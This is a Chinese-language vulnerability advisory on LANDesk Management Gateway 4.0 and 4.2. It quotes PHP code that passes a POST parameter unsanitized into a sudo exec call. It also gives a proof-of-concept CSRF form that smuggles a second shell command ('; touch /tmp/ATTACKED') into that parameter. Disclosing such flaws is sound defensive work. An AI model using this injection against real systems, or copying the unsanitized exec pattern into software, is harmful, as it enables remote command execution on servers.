LANDesk管理网关工具跨站脚本和跨站请求伪造漏洞
发布日期:2010-02-05
更新日期:2010-02-08
受影响系统:LANDesk Software LANDesk Management Gateway 4.2
LANDesk Software LANDesk Management Gateway 4.0
不受影响系统:LANDesk Software LANDesk Management Gateway 4.2-1.61
LANDesk Software LANDesk Management Gateway 4.0-1.61
描述:
BUGTRAQ ID:
38119
CVE ID:
CVE-2010-0368,
CVE-2010-0369
LANDesK管理网关工具是安全的系统管理套件。
Landesk管理网关工具没有充分验证提交特制请求的用户,当Web应用接收到删除之前所生成备份的请求时,会由gsb/BackupRestoreTab.php处理该请求:
/-----
19 $cmd = "sudo /subin/backuptool --delete {$_POST['delBackupName']}";
20 exec($cmd);
21 $msg = "Successfully Removed: {$_POST['delBackupName']}
- -----/
攻击者可以通过创建delBackupName参数诱骗客户端向web服务器提交非预期的请求,生成并发送将在Web服务器环境(BackupRestoreTab.php:20)中执行的任意命令行(BackupRestoreTab.php:19)。
如果要触发这个漏洞,必须能够向gsb/datetime.php发送带有以下参数的POST请求:
/-----
<delBackupName>: 'a; [injection]'
<backupRestoreFormSubmitted>: 'b'
- -----/
<*来源:Aureliano Calvo
Adrian Manrique
链接:
http://secunia.com/advisories/38474/
http://marc.info/?l=bugtraq&m=126538631521391&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/-----
<html>
<head><title>LANDesk PoC</title></head>
<body>
<form method="post" action="https://[server]/gsb/datetime.php">
<input type="text" name="delBackupName" value="; touch
/tmp/ATTACKED">
<input type="text" name="backupRestoreFormSubmitted" value="b">
<input type="submit" value="Attack!">
</form>
</body>
</html>
- -----/
建议:
厂商补丁:
LANDesk Software
----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://community.landesk.com/support/docs/DOC-8333/浏览次数:2487
严重程度:0(网友投票)